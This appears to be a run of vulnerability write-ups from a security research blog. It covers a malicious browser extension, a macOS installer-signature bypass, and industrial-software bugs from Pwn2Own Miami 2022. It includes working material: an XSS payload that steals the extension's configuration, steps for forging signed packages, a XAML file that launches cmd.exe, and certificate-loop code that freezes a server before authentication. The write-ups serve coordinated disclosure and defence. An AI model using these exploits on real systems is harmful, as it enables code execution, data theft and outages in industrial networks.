  "links_bugreport": "",
  "selected_fp": {
    "bot_id": "",
    "hash_unique": ""
  "act_key": false,
  "plugin_id": false,
  "clean_settings": {
    "items": {},
    "since": 0

The URL for the activation is constructed by taking a value from the links_domain_sync and appending the link_path_sync path.

Note that this extension had just been installed and not activated, so the values will differ when the extension is in use. It seems likely that the link_path_bots endpoint is used to automatically retrieve the list of cookies and online fingerprints the buyer has bought. The proxy and selected_fp fields would be filled in if the extension were in use.

The configuration can also be obtained from disk from files at the following path:

<Chrome Settings Dir>/Default/Local Extension Settings/<Extension ID>/*.log

This is a LevelDB database, which appears to also keep a number of older versions of the configuration.
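For offline analysis, such a store can be dumped with any LevelDB library; a short sketch (assumes the plyvel package and a copy of the directory, since the browser keeps the live database locked):

# Dump all key/value pairs from a copy of the extension's LevelDB store.
# <Extension ID> is a placeholder, as in the path above.
import plyvel

db = plyvel.DB("Default/Local Extension Settings/<Extension ID>", create_if_missing=False)
for key, value in db:
    print(key.decode(errors="replace"), value[:120])
db.close()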

The extension contains functionality (and has the permission) to configure a SOCKS5 proxy. In the victim’s extension, a method for proxying HTTPS requests through the victim’s browser was found that uses WebSockets. The functionality to send requests over such a WebSocket connection was not found in the buyer’s extension, although due to the obfuscation we cannot be fully certain. It remains an open question whether proxying through the victim’s machine directly was a feature offered by the market, or whether buyers only used their own SOCKS5 proxies.

Fingerprinting buyers

The content script that the extension adds to each visited webpage registers an event handler for a custom event named hammilton. This appears to be a method for a webpage to communicate with the extension, as the result is passed back to the page. When the content script receives this event, it sends a message to the background script, which sends back a response as JavaScript code that is evaluated in the content script:

location.href = 'javascript: if(window.bunny && window.bunny.cb && window.bunny.cb[0])window.bunny.cb[0]([{"result":{"result":0}}])'

Therefore, by setting window.bunny.cb[0] to a JavaScript function and sending the event, it is possible to determine whether a user has this extension installed by checking if that function is called.

window.bunny = { "cb": [function() {
	console.log("Extension detected.");

window.dispatchEvent(new CustomEvent("hammilton", {"detail": {"l": "0", "o": "b"}}));

The reason why this is present is not entirely clear to us. However, it does provide us with a nice way of fingerprinting the buyers’ extension.

Taking it one step further…

Fingerprinting buyers is already cool of course, but maybe we can take it one step further? For example, by exploiting an XSS vulnerability in the extension itself? There is a vulnerability in the method used to communicate back to the webpage: the parameter l in the custom event’s detail object is used as-is, without escaping, in the response code that is evaluated. By including a single quote character ('), it is possible to inject additional JavaScript code that gets executed in the context of the content script.

For example, the following event, sent from the webpage:

window.dispatchEvent(new CustomEvent("hammilton", {"detail": {"l": "a'; console.log(1); //", "o": "b"}}));

Results in the following code being evaluated inside the content script (newlines added for legibility):

location.href = 'javascript: if(window.bunny && window.bunny.cb && window.bunny.cb[a';
console.log(1); //])window.bunny.cb[a'; console.log(1); //]([{"result":{"result":0}}])'

Therefore, the console.log(1) is executed by the content script, instead of the page.

Browser extensions use an (invisible) background page which can use all the permissions granted to that extension. This background page does not directly have access to the contents of the visited webpages, but it can inject new JavaScript to run on those pages, called “content scripts”. Content scripts have access to a specific page and can interact with that page’s DOM, but use a JavaScript environment that is separate from the page’s own JavaScript environment. Content scripts do not have all the permissions of the background page, but they do have permission to send messages to the background page and can access the storage of the extension, making them more powerful than the page’s own JavaScript.

Therefore, one of the things that can be done by sending messages to the background page is copying the configuration of the plugin. For example:

window.addEventListener("storage", function (event) {
  document.getElementById("log").innerText += "Storage obtained: " + JSON.stringify( + "\n";

var payload = `, (storage) => { window.dispatchEvent(new CustomEvent("storage", {"detail": {"storage": storage }})); });`;

window.parent.dispatchEvent(new CustomEvent("hammilton", {"detail": {"l": "a';" + payload + "; //", "o": "b"}}));

We have actually included a script in this page which exploits this precise vulnerability (if you have this extension installed). It first turns off the proxy functionality, and then uploads your extension configuration to us.


We would like to thank all law enforcement agencies that collaborated on this case to take this marketplace down; we’re glad we could be of assistance. All findings have been shared with the authorities and all malicious files have been reported to the relevant organisations. Hopefully this post can help future researchers if this marketplace ever comes back online.

If you have any followup questions, feel free to reach out.

For reference, these are the files that we investigated (the buyers side is purposely excluded from this list):

File name           SHA1 hash
setup.exe           b3e56f7affa17403d3df4ebf4c95b14928798bd6
yvibiajwi.dll       78c43eb6d80888c8153868ebc60ca522185a1fce
svchost.exe         f811f77f5b53c13a06b43b10eb6189513f66d2a2
Qruhaepdediwhf.dll  e87a4c23eac88803f27565c2a035222473167a14
v3.bs64             36af8aac85d4770146d7b6c6cbb0dc7691c6263a

Bad things come in large packages: .pkg signature verification bypass on macOS

13 January 2023 at 00:00

Code signing of applications is an essential element of macOS security. Besides signing applications, it is also possible to sign installer packages (.pkg files). During a short review of the xar source code, we found a vulnerability (CVE-2022-42841) that could be used to modify a signed installer package without invalidating its signature. This vulnerability could be abused to bypass Gatekeeper, SIP and under certain conditions elevate privileges to root.


Installer packages are based on xar files with a number of predefined file names. The method for signing installer packages is the same as generating signed xar files, so to start we’ll explain how that file format works.

A xar file consists of 3 parts: a fixed length header, a table of contents (TOC) and what is called the “heap”.

The header contains a number of fields, including the hashing algorithm that is used throughout the file (typically still SHA1) and the size of the TOC.

The TOC is a zlib-compressed XML document. This document lists for each file included in the archive the start address and length where the contents can be found on the heap, starting with 0 for the first byte directly after the TOC. Each file in the archive can be compressed independently by specifying an encoding, so when creating an archive file it is possible to choose the optimal way of storing each file.

For all files, a hash is included in the TOC of both the uncompressed and compressed data, using the hashing algorithm specified in the header.

For example:

<file id="4">
    <encoding style="application/x-bzip2"/>
    <extracted-checksum style="sha1">c5c07ac6917dbbbacf1044700559dfff3c96ac26</extracted-checksum>
    <archived-checksum style="sha1">bda75d4a4f97c71985cdb5d3350fea8a62bbad0e</archived-checksum>

Even xar files that are not signed have these hashes and so the integrity can be verified when extracting a file.

To verify the integrity of the entire archive, the TOC also lists the location on the heap where a value known as the “TOC hash” is stored. In practice this is usually at offset 0:

<checksum style="sha1">

The value stored here must be equal to the hash of the compressed TOC data and this is verified when the archive is opened. The reason this is included on the heap and not in the TOC itself is that this would create a cyclic dependency: adding this value into the TOC would change the TOC and the TOC hash again.

This hash indirectly guarantees the integrity of all files in the archive: for each file, the extracted-checksum in the TOC ensures the integrity of that file. The integrity of the TOC is covered by the TOC hash. This construction has the nice benefit that a single file can be extracted and validated without having to validate the entire archive. This means it is possible to extract files from xar archives without completely reading the archive, or possibly even without completely downloading it.
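To make this concrete, here is a minimal Python sketch that parses the header, decompresses the TOC and checks the TOC hash (assumptions: the standard big-endian header layout from xar’s xar.h, SHA1 as the hash algorithm, a TOC rooted at <xar><toc>, and "example.pkg" as a placeholder file name):

# Parse a xar archive and verify its TOC hash, per the description above.
import hashlib, struct, zlib
import xml.etree.ElementTree as ET

with open("example.pkg", "rb") as f:
    magic, hdr_size, version, toc_clen, toc_ulen, cksum_alg = struct.unpack(
        ">4sHHQQL", f.read(28))
    assert magic == b"xar!"

    f.seek(hdr_size)                      # the header may be padded
    toc_compressed = f.read(toc_clen)
    toc = ET.fromstring(zlib.decompress(toc_compressed))

    # The TOC itself says where on the heap its own hash is stored.
    checksum = toc.find("toc/checksum")
    offset = int(checksum.findtext("offset"))
    size = int(checksum.findtext("size"))

    heap_start = hdr_size + toc_clen      # the heap begins right after the TOC
    f.seek(heap_start + offset)
    stored = f.read(size)

print(hashlib.sha1(toc_compressed).digest() == stored)  # True for a valid file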

Signed xar files additionally contain a signature element with a certificate chain in the TOC:

<signature style="RSA">
  <KeyInfo xmlns="">

The signature itself is also stored on the heap (for the same cyclic dependency reason). The data used for generating the signature is the TOC hash. This signature therefore ensures the authenticity of all files in the archive.

Interestingly, this design does mean that data on the heap that is not included in any of the ranges can be modified without invalidating the signature. For example, appending more data to a xar file will always keep the TOC hash and signature valid.

The vulnerability

For signed packages, the TOC hash needs to be used for two different checks:

  • The computed TOC hash needs to be equal to the TOC hash stored on the heap.
  • The signature and the certificates need to correspond to the TOC hash.

This is implemented in the following locations in the xar source code.

Here, the computed TOC hash is compared to the value stored on the heap:

/* if TOC specifies a location for the checksum, make sure that
 * we read the checksum from there: this is required for an archive
 * with a signature, because the signature will be checked against
 * the checksum at the specified location <rdar://problem/7041949>
 */
const char *value;
uint64_t offset = 0;
uint64_t length = 0;
if( xar_prop_get( XAR_FILE(ret) , "checksum/offset", &value) == 0 ) {
    if (value) {
        errno = 0;
        offset = strtoull( value, (char **)NULL, 10);
        if( errno != 0 ) {
            fprintf(stderr, "checksum/offset missing or invalid!\n");
            return NULL;
        }
    } else {
        fprintf(stderr, "checksum/offset missing or invalid!\n");
        return NULL;
    }
}

XAR(ret)->heap_offset = xar_get_heap_offset(ret) + offset;
if( lseek(XAR(ret)->fd, XAR(ret)->heap_offset, SEEK_SET) == -1 ) {
    return NULL;
}

size_t tlen = 0;
void *toccksum = xar_hash_finish(XAR(ret)->toc_hash_ctx, &tlen);
XAR(ret)->toc_hash_ctx = NULL;

if( length != tlen ) {
    return NULL;
}

// Store our toc hash upon archive open, so callers can determine if it
// has changed or been tampered with after archive open
XAR(ret)->toc_hash = malloc(tlen);
memcpy(XAR(ret)->toc_hash, toccksum, tlen);
XAR(ret)->toc_hash_size = tlen;

void *cval = calloc(1, tlen);
if( ! cval ) {
    return NULL;
}

ssize_t r = xar_read_fd(XAR(ret)->fd, cval, tlen);

if( memcmp(cval, toccksum, tlen) != 0 ) {
    fprintf(stderr, "Checksums do not match!\n");
    return NULL;
}

This first retrieves the checksum offset attribute from the XML document as a const char *value. Then, strtoull converts it to an unsigned 64-bit integer, which gets stored in the offset variable.

For obtaining the TOC hash for validating the signature, a similar bit of code is used:

uint32_t offset = 0;
xar_t x = NULL;
const char  *value;

// xar 1.6 fails this method if any of data, length, signed_data, signed_length are NULL
// within OS X we use this method to get combinations of signature, signed data, or signed_offset,
// so this method checks and sets these out values independently

if( !sig )
  return -1;

x = XAR_SIGNATURE(sig)->x;

/* Get the checksum, to be used for signing.  If we support multiple checksums
  in the future, all checksums should be retrieved            */
if(length) {
  if(0 == xar_prop_get_expect_notnull( XAR_FILE(x) , "checksum/size", &value)){
    *length  = strtoull( value, (char **)NULL, 10);
  }

  if(0 == xar_prop_get_expect_notnull( XAR_FILE(x) , "checksum/offset", &value)){
    offset  = strtoull( value, (char **)NULL, 10);
  }
}

if(data) {
  *data = malloc(sizeof(char)*(*length));

  // This function will either read all of length or return -1. Check and bubble up.
  if (_xar_signature_read_from_heap(x, offset, *length, *data) != 0)
    return -1;
}
Note here the tiny but very important difference: while the first check stored the offset in a uint64_t offset (a 64-bit unsigned integer), this one uses a uint32_t offset (a 32-bit unsigned integer). As a result, if the offset lies outside the range that can be stored in a 32-bit value, the two checks use different heap offsets. For example, if the offset is equal to 0x1 0000 0000, the integrity hash will be read from offset 0x1 0000 0000, while the signature hash will be read from offset 0x0 on the heap.
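In miniature, the inconsistency looks like this (an illustrative Python sketch, not xar code):

# The same attacker-controlled checksum/offset value, parsed into the two
# differently sized integers used by the two code paths above.
checksum_offset = 4294967296                          # 0x1 0000 0000

integrity_offset = checksum_offset & ((1 << 64) - 1)  # uint64_t: unchanged
signature_offset = checksum_offset & ((1 << 32) - 1)  # uint32_t: wraps to 0

print(integrity_offset, signature_offset)             # 4294967296 0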

Thus, it was possible to modify a xar file without invalidating its signature as follows:

  1. Take a correctly signed xar file and parse the TOC.
  2. Change the checksum offset value to 4294967296 (and make any other changes you want to the included files, like adding a malicious preinstall script or replacing the installation check script).
  3. Write the modified TOC back to the file and compute the new TOC hash.
  4. Add padding until the heap is exactly 4294967296 bytes (4 GiB) in size.1
  5. Place the new TOC hash at heap offset 4294967296, leaving the original TOC hash at heap offset 0.

When this package is verified, the integrity check will use the hash at offset 4294967296, while the signature verification will read it from offset 0. The integrity check will pass, because the new TOC hash is placed there, while the signature will also pass, because the signatures still correspond to the old TOC hash.


This was quite an interesting bug that could be applied in a number of different ways, with different requirements and impact.

Bypassing SIP’s filesystem restrictions

When a package signed by Apple is installed, installation works a little differently compared to the installation of a package signed by anyone else. These installations are performed by system_installd instead of installd, which has an entitlement granting it access to all files normally protected by SIP:

  com.apple.rootless.install.heritable [Bool] true

This makes sense, as updates from Apple often need to write to protected locations, like replacing components of the OS.

Abusing this vulnerability to modify a package signed by Apple would make it possible to read and write to all those SIP protected files. This could be used to, for example:

  • Grant an application TCC permissions, like access to the webcam, microphone, etc.
  • Read data from a data vault, such as the user’s Mail and Safari data.
  • Load a kernel extension without user approval on Intel Macs (although the kernel extension would need to be properly signed).

This could be used to modify a package that a user installs manually, although that requires convincing the user. Another option would be for a process that has already obtained root privileges to use this to gain access to SIP-protected locations, as the root user is allowed to use the installer command to install new packages.

Note that any files on the Signed System Volume (SSV) could not be modified this way, as that disk is mounted read-only.

Bypassing Gatekeeper

After downloading a .pkg file, Gatekeeper will perform a notarization check, similar to that for applications. It takes the hash of the package and submits it to Apple to check that it has been scanned for malware. When a user opens a package that was not notarized, they receive a scary warning, making it quite difficult to trick a user into installing a package containing malware.

The method for querying Apple’s server for the notarization status of a package uses the same function to obtain the TOC hash as was used for the signature verification. Therefore, a modified package will still be considered notarized if the original was. This means that if a user downloads such a modified package file, they will not be warned in any way.

Asking users to download a 4 GiB .pkg sounds like a challenge. Even if users don’t notice the unusual size, having to wait a few minutes for the download to finish could make them suspect something is off about the webpage offering it. Luckily, the padding in the package can be anything, so when the same byte is used for all of it, the resulting file compresses very well. By placing the package on a compressed disk image, the resulting .dmg file can be only a few hundred kilobytes, and distributing an application this way is not unusual for macOS. The increased size also does not increase the time required to verify the package since, as mentioned, only the integrity of heap data that is actually in use is checked.
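The claim about compressibility is easy to sanity-check (an illustrative sketch; the exact ratio depends on the compressor used by the disk image):

# 4 GiB of identical padding bytes compresses down to a few MiB with zlib.
import zlib

compressor = zlib.compressobj(9)
chunk = b"\x00" * (1024 * 1024)       # 1 MiB of zero padding at a time
total = 0
for _ in range(4 * 1024):             # 4 GiB in total
    total += len(compressor.compress(chunk))
total += len(compressor.flush())
print(f"{total / 1024**2:.1f} MiB compressed")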

Combining this with the previous vulnerability would allow for some very powerful malware: it would be possible to create a manipulated installer package that appears completely legitimate and triggers no warnings when installed. After the user installs it, the malware immediately gains complete access to all SIP-protected data on the system.

Elevating privileges

We did not find a way to abuse this vulnerability for privilege escalation on an out-of-the-box installation of macOS. However, when combined with certain third-party software, we did find a method.

Some applications try to make sure that their application can update itself automatically, even if the current user is not an admin user. Normally, non-admin users are not allowed to make changes in /Applications, so they can not update any existing applications. If the admin never logs in, this could mean that users run known vulnerable software indefinitely.

To solve that, some applications include a privileged helper tool to perform the upgrade. This is a tool that runs as root and has the single purpose of installing updates for the existing application. Often, the application itself handles the checking for updates and downloading a new update file, the tool only performs the actual installation.

To make this secure, there are two important checks:

  • A request to install an update must originate from the associated application.
  • The update file must be authentic (and not a downgrade).

The format of the update file varies between the applications that implement this, but using .pkg files is common. If this method is used, then it may be possible to swap out an update package with a modified version. For example, by using a race condition to change the package in between the download by the application and the actual installation by the privileged helper tool. This means that the package would be installed automatically, allowing privilege escalation to root.

In fact, this vulnerability was originally discovered while investigating the privileged helper tool used by Zoom. In his DEF CON 30 talk “You’re Muted Rooted”, Patrick Wardle described a method for bypassing the signature verification performed by Zoom. This was addressed by switching to the libxar functions for verifying a package signature.


During our research into the full impact of this vulnerability, we also attempted to modify macOS system updates. These also use .pkg files and verify the TOC hash; however, they compare the signature against the computed TOC hash rather than the copy on the heap. Therefore, replacing a system update with a malicious file is not possible.

This issue also does not affect iOS: as far as we could tell, xar files are not used anywhere there. While signed xar files were used for Safari extensions in the past, those now use app extensions, so we could not identify any impact there either.


The following video demonstrates the use of this vulnerability to bypass Gatekeeper and SIP. As can be seen, it creates a new file in /private/var/db/SystemPolicyConfiguration/, a directory normally protected by SIP.

(Note that the installer states that the installation has failed, but the exploit already ran using a pre-install script. This is only the case for the demo and could be avoided for a real attack.)

The fix

This was fixed by Apple with a 2-character fix: changing uint32_t to uint64_t in macOS 13.1.

What is interesting about this vulnerability is that there was a similar issue in 2010: CVE-2010-0055. In that version, one of the checks assumed that the TOC hash offset was always 0, while the other used the value read from the TOC. Vulnerabilities that are variants of fixed issues, and regressions that re-introduce a vulnerability, are sadly common, but seeing a variant of a 12-year-old vulnerability is still surprising. Especially considering that a small change to this library could have prevented all similar vulnerabilities leading to the same result.

A comment in the code snippet above notes the following:

Store our toc hash upon archive open, so callers can determine if it has changed or been tampered with after archive open

Using this stored value instead of reading it from the file again would have made this vulnerability, and any similar variants, impossible to exploit as the value would not be read from the heap twice.

  1. If the original package is already more than 4 GiB in size, then there are a number of options. For example, padding the file to 8, 12, 16, etc. GiB instead. Or it would be possible to move files on the heap around to make the offset 4294967296 available. ↩︎

Pwn2Own Miami 2022: ICONICS GENESIS64 Arbitrary Code Execution

17 October 2022 at 00:00

This write-up is part 5 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for an Arbitrary Code Execution vulnerability in ICONICS GENESIS64 (CVE-2022-33315).

We successfully demonstrated this vulnerability during the competition; however, it turned out that the vendor was already aware of it. As this was also one of the most shallow bugs we used during the competition, this was something we had anticipated. The bug was originally reported by Zymo Security and had already been disclosed. Luckily, this was the only bug collision we had during this competition.

A 3rd bug collision on Day 1. The team @sector7_nl successfully popped calc, but the bug they used had been disclosed earlier in the competition. They still win $5,000 and 5 Master of Pwn points. #Pwn2Own

— Zero Day Initiative (@thezdi) April 19, 2022

GENESIS64 was one of the two targets in the Control Server category. It is more of a software suite than a single application and can be used to design and visualize entire ICS environments. From dashboards and control screens to visualizing entire factory floors in 3D.

Save files

For this category it was acceptable to achieve code execution by opening a file within the target on the contest laptop. The files must be of a type that is handled by default by the target application. So we opened up one of the applications that came with the GENESIS64 installer. We chose GraphWorX64 at random (it is normally used to design HMI/SCADA control screens) and saved an empty file. When looking at the empty project file, we can see it is stored as a WPF XAML file:

<?xml version="1.0" encoding="utf-8"?>
<Canvas Background="#FFFFFFFF" Width="3840" Height="2320" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:iwm="clr-namespace:Ico.Windows.Media;assembly=IcoWPF" xmlns:gwx="clr-namespace:Ico.Gwx;assembly=GwxRuntimeCore">
        <BitmapImage x:Key="GwxThumbnailImageKey">
        <gwx:GwxDocument FileVersion="" ScanRate="500" />

Using XAML it is possible to directly instantiate objects of arbitrary types. This makes it unsuitable for loading untrusted input files. We quote a small piece of the relevant documentation (System.Windows.Markup.XamlReader) from Microsoft regarding the loading of untrusted XAML files:

Code Access Security, Loose XAML, and XamlReader

XAML is a markup language that directly represents object instantiation and execution. Therefore, elements created in XAML have the same ability to interact with system resources (network access, file system IO, for example) as the equivalent generated code does.

The implications of these statements for XamlReader is that your application design must make trust decisions about the XAML you decide to load. If you are loading XAML that is not trusted, consider implementing your own sandboxing technique for how you load the resulting object graph.

Unfortunately GENESIS64 has no such sandboxing technique in place, so instantiating arbitrary objects is trivial. The actual decoding of this file seems to happen in Components/IcoWPF.dll, using a wrapper around XamlReader().

Our exploit

In the end we used the following XAML file for instantiating a Process object and providing it the necessary parameters for starting our beloved calculator. This calls the method Start using the parameters cmd.exe /c calc.exe:

<?xml version="1.0" encoding="utf-8"?>
<Canvas xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=System" xmlns:gwx="clr-namespace:Ico.Gwx;assembly=GwxRuntimeCore">
    <Canvas.Resources>
        <ObjectDataProvider x:Key="Sector7" ObjectType="{x:Type Diag:Process}" MethodName="Start">
            <ObjectDataProvider.MethodParameters>
                <System:String>cmd.exe</System:String>
                <System:String>/c calc.exe</System:String>
            </ObjectDataProvider.MethodParameters>
        </ObjectDataProvider>
    </Canvas.Resources>
    <gwx:GwxDocument FileVersion="" ScanRate="500" />
</Canvas>

You can see the exploit in action in the screen recording below.


To fully mitigate this vulnerability, we would advise using a different file format. However, this would also mean that old project files could no longer be loaded. ICONICS settled for a blocklist approach with the release of version 10.97.2. In that version, the XAML file is pre-parsed before being passed to XamlReader() and certain classes are excluded from deserialization.
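As an illustration of the general approach (not ICONICS’s actual implementation, and with a blocklist that is our own assumption), such a pre-parse could look like this in Python:

import xml.etree.ElementTree as ET

# Reject documents containing blocklisted element types before handing the
# XAML to the real parser. The blocklist contents here are assumptions.
BLOCKED = {"ObjectDataProvider", "Process"}

def is_safe(xaml_text):
    for element in ET.fromstring(xaml_text).iter():
        tag = element.tag.split("}")[-1]  # strip any XML namespace prefix
        if tag in BLOCKED:
            return False
    return True

print(is_safe('<Canvas><ObjectDataProvider /></Canvas>'))  # False

The usual caveat applies: a blocklist is only as good as its coverage, and any dangerous class that is missed re-opens the issue.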

We thank Zero Day Initiative for organizing this year's edition of Pwn2Own Miami, and we hope to return at a later edition!

You can find the other four write-ups here:

  • Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass
  • Pwn2Own Miami 2022: Inductive Automation Ignition Remote Code Execution
  • Pwn2Own Miami 2022: AVEVA Edge Arbitrary Code Execution
  • Pwn2Own Miami 2022: Unified Automation C++ Demo Server DoS

Pwn2Own Miami 2022: Unified Automation C++ Demo Server DoS

14 September 2022 at 00:00

This write-up is part 4 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for a Denial-of-Service in the Unified Automation OPC UA C++ Demo Server (CVE-2022-37013).

Confirmed! The team from @sector7_nl leveraged an infinite loop condition to create a DoS against the Unified Automation C++ Demo Server. They earn $5,000 and 5 points towards Master of Pwn. #Pwn2Own #P2OMiami

— Zero Day Initiative (@thezdi) April 20, 2022

OPC UA is a communication protocol used in the ICS world. It is an open standard developed by the OPC Foundation. Because it is implemented by many vendors, it is often the preferred protocol for setting up communication between systems from different vendors in an ICS network.

At Pwn2Own Miami 2022, four OPC UA servers were in scope, with three different “payload” options:

  • Denial-of-Service. Availability is everything in an ICS network, so being able to crash an OPC UA server can have significant impact.
  • Remote code execution. Being able to take over the server.
  • Bypass Trusted Application Check. Setting up a trusted connection to a server without having a valid certificate.

If a client connects to the server, it first needs to authenticate using a client certificate; we call this the trusted application check. The protocol also supports user authentication, using either a username/password combination or a certificate, but only after the client application itself has been authenticated. Although OPC UA uses the same X.509 certificates as TLS, the protocol itself is not based on TLS.

For the OPC UA server category we focused on bypassing the trusted application check, as this would gain us the most points. We did not look at remote code execution vulnerabilities. A trusted application means the application can authenticate with a valid certificate. This meant we only had to audit the certificate verification function, which is a very limited scope. We looked at all applications in scope, and in the end did find such a vulnerability in the OPC Foundation OPC UA .NET Standard (you can find the write-up for this vulnerability here).

In the Unified Automation C++ Demo Server we couldn’t find a way to bypass the check, however we did find a reliable Denial-of-Service while reviewing this. Since this Denial-of-Service is in the certificate verification function, it means we can trigger this vulnerability before authentication. In the ICS world where everything revolves around availability, having a vulnerability that allows the attacker to reliably disable a central component is less than ideal.

Certificate verification

Verifying the certificate for a client is handled by the function OpcUa_P_OpenSSL_PKI_ValidateCertificate() in uastack.dll. This function will call OpcUa_P_OpenSSL_CertificateStore_IsExplicitlyTrusted(), which will check if the certificate or any of its issuers are already explicitly trusted. It does so by walking the certificate chain and checking whether each certificate is equal to a trusted certificate, meaning its SHA1 hash equals that of a file under the pki/trusted/certs folder on the server.
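Condensed to its essence, the check described above boils down to something like the following Python sketch (ours, not the vendor's code):

import hashlib
from cryptography import x509
from cryptography.hazmat.primitives import serialization

def is_explicitly_trusted(cert_pem, trusted_thumbprints):
    # The "thumbprint" is the SHA1 hash over the DER encoding, compared
    # against the hashes of the files under pki/trusted/certs.
    cert = x509.load_pem_x509_certificate(cert_pem)
    der = cert.public_bytes(serialization.Encoding.DER)
    return hashlib.sha1(der).hexdigest().upper() in trusted_thumbprints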

The source code for this function seems to be similar to some code from the OPC Foundation, which can be found on GitHub:

static OpcUa_StatusCode OpcUa_P_OpenSSL_CertificateStore_IsExplicitlyTrusted(
    OpcUa_P_OpenSSL_CertificateStore* a_pStore,
    X509_STORE_CTX* a_pX509Context,
    X509* a_pX509Certificate,
    OpcUa_Boolean* a_pExplicitlyTrusted)
{
    X509* x = a_pX509Certificate;
    X509* xtmp = OpcUa_Null;
    int iResult = 0;
    OpcUa_UInt32 jj = 0;
    OpcUa_ByteString tBuffer;
    OpcUa_Byte* pPosition = OpcUa_Null;
    OpcUa_P_OpenSSL_CertificateThumbprint tThumbprint;

OpcUa_InitializeStatus(OpcUa_Module_P_OpenSSL, "CertificateStore_IsExplicitlyTrusted");

    /* ... initialization elided ... */

    *a_pExplicitlyTrusted = OpcUa_False;

    /* follow the trust chain. */
    while (!*a_pExplicitlyTrusted)
    {
        /* need to convert to DER encoded certificate. */
        int iLength = i2d_X509(x, NULL);

        if (iLength > tBuffer.Length)
        {
            tBuffer.Length = iLength;
            tBuffer.Data = OpcUa_P_Memory_ReAlloc(tBuffer.Data, iLength);
        }

        pPosition = tBuffer.Data;
        iResult = i2d_X509((X509*)x, &pPosition);

        if (iResult <= 0)
        {
            /* ... error handling elided ... */
        }

        /* compute the hash */
        SHA1(tBuffer.Data, iLength, tThumbprint.Data);

        /* check for thumbprint in explicit trust list. */
        for (jj = 0; jj < a_pStore->ExplicitTrustListCount; jj++)
        {
            if (OpcUa_MemCmp(a_pStore->ExplicitTrustList[jj].Data, tThumbprint.Data, SHA_DIGEST_LENGTH) == 0)
            {
                *a_pExplicitlyTrusted = OpcUa_True;
            }
        }

        if (*a_pExplicitlyTrusted)
        {
            break;
        }

        /* end of chain if self signed. */
        if (X509_STORE_CTX_get_check_issued(a_pX509Context)(a_pX509Context, x, x))
        {
            break;
        }

        /* look in the store for the issuer. */
        iResult = X509_STORE_CTX_get_get_issuer(a_pX509Context)(&xtmp, a_pX509Context, x);

        if (iResult == 0)
        {
            break;
        }

        /* oops - unexpected error */
        if (iResult < 0)
        {
            /* ... error handling elided ... */
        }

        /* goto next link in chain. */
        x = xtmp;
    }

    /* ... */
}

It checks whether the SHA1 hash of the certificate is in the known trusted list. If not, it continues the while loop by checking whether the issuer (obtained using X509_STORE_CTX_get_get_issuer()) is on the trusted list instead. This continues until the entire chain has been checked.

However, what if there is a loop in the chain? In that case the while loop turns into an infinite loop, as there is always another certificate to check. Since all network handling occurs in a single thread in the demo application, this effectively makes the server unresponsive for all clients, creating a nice and effective Denial-of-Service. A loop of length one is a self-signed certificate, which is checked for (the call to X509_STORE_CTX_get_check_issued()), but it is also possible to construct a longer loop of certificates.

Our exploit

Our exploit is simple. First we generate two certificates, A and B. Since signing a certificate only requires the private key, we can sign certificate A with the key of B, and B with the key of A. This creates a certificate chain where both certificates have each other as issuer, thus forming a loop.

import datetime

from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

backend = default_backend()

def make_cert(name, issuer, public_key, private_key, identifier, issuer_identifier):
	one_day = datetime.timedelta(1, 0, 0)
	today = datetime.datetime.today()

	builder = x509.CertificateBuilder()
	builder = builder.subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, name)]))
	builder = builder.issuer_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, issuer)]))
	builder = builder.not_valid_before(today - (one_day * 7))
	builder = builder.not_valid_after(today + (one_day * 90))
	builder = builder.serial_number(x509.random_serial_number())
	builder = builder.public_key(public_key)
	builder = builder.add_extension(x509.SubjectKeyIdentifier(identifier), critical=False)
	builder = builder.add_extension(x509.AuthorityKeyIdentifier(key_identifier=issuer_identifier, authority_cert_issuer=None, authority_cert_serial_number=None), critical=False)
	builder = builder.add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=False)

	# No idea if all of these are needed, but data_encipherment is required.
	builder = builder.add_extension(x509.KeyUsage(digital_signature=True, content_commitment=True, key_encipherment=True, data_encipherment=True,
		key_agreement=True, key_cert_sign=True, crl_sign=True, encipher_only=False, decipher_only=False), critical=False)

	# The certificate is actually self-signed, but this doesn't matter because the signature is not checked.
	certificate = builder.sign(private_key=private_key, algorithm=hashes.SHA256(), backend=backend)

	return certificate

private_keyA = rsa.generate_private_key(public_exponent=65537, key_size=3072, backend=backend)
public_keyA = private_keyA.public_key()

private_keyB = rsa.generate_private_key(public_exponent=65537, key_size=3072, backend=backend)
public_keyB = private_keyB.public_key()

certA = make_cert("A", "B", public_keyA, private_keyB, b"1", b"2")
certB = make_cert("B", "A", public_keyB, private_keyA, b"2", b"1")

By trying to authenticate to the server using one of these certificates and including the other as an additional certificate, we can see that eventually we reach a timeout and the server spins at 100% CPU usage.

You can see the exploit in action in the screen recording below.


OPC UA is often a central component between the IT and OT network of an organisation. Being able to reliably shut it down pre-authentication is a powerful primitive to have. This vulnerability shows yet again that validating certificates is an error-prone operation that should be handled with care.

This issue was fixed in version v1.7.7-549 and was given the CVE number CVE-2022-29862. Unified-Automation now uses the certificate stack that was constructed by OpenSSL for validation.

We thank Zero Day Initiative for organizing this year's edition of Pwn2Own Miami, and we hope to return at a later edition!

You can find the other four write-ups here:

  • Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass
  • Pwn2Own Miami 2022: Inductive Automation Ignition Remote Code Execution
  • Pwn2Own Miami 2022: AVEVA Edge Arbitrary Code Execution
  • Pwn2Own Miami 2022: ICONICS GENESIS64 Arbitrary Code Execution

Pwn2Own Miami 2022: AVEVA Edge Arbitrary Code Execution

8 September 2022 at 00:00

This write-up is part 3 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for an Arbitrary Code Execution vulnerability in AVEVA Edge (CVE-2022-28688).

